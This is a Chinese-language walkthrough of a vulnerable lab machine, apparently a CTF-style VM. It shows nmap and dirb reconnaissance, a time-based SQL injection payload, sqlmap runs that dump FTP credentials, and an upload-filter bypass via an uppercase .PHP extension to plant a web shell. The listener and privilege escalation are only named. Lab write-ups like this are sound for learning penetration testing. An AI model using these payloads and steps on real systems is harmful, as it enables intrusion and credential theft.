主机层面扫描探测：

╰─ nmap -p1-65535 -sV -A 10.10.202.132

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 09:10 CST
Nmap scan report for 10.10.202.132
Host is up (0.00087s latency).
Not shown: 55531 filtered ports, 10002 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:07:37:5D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: OS: Unix

web目录枚举

╰─ dirb http://10.10.202.132 -X.php

---- Scanning URL: http://10.10.202.132/ ----
+ http://10.10.202.132/library.php (CODE:200|SIZE:1546)

http://10.10.202.132/library.php

http://10.10.202.132/library.php?country=Netherlands #true

http://10.10.202.132/library.php?country=Netherlands' #false

验证是否存在注入漏洞

经过尝试，需要更改HTTP的请求方式为：POST

POST /library.php HTTP/1.1
Host: 10.10.202.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=sklv0krnnccv6ugcvp568fdqo7
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

country=England' and if(substr(@@version,1,1)=5,sleep(5),1)--+

复制到文本文件，使用SQLmap 进行注入

╰─ sqlmap -r target.txt --risk 3 --level 5 --batch

╰─ sqlmap -r target.txt --risk 3 --level 5 --batch --tables -D library -T access -C password,service,username --dump

AroundTheWorld | ftp     | globus

上传php后缀无法上传，更改后缀为PHP，成功绕过上传限制

http://10.10.202.132/shell.PHP 

本地监听

进行提权操作

完！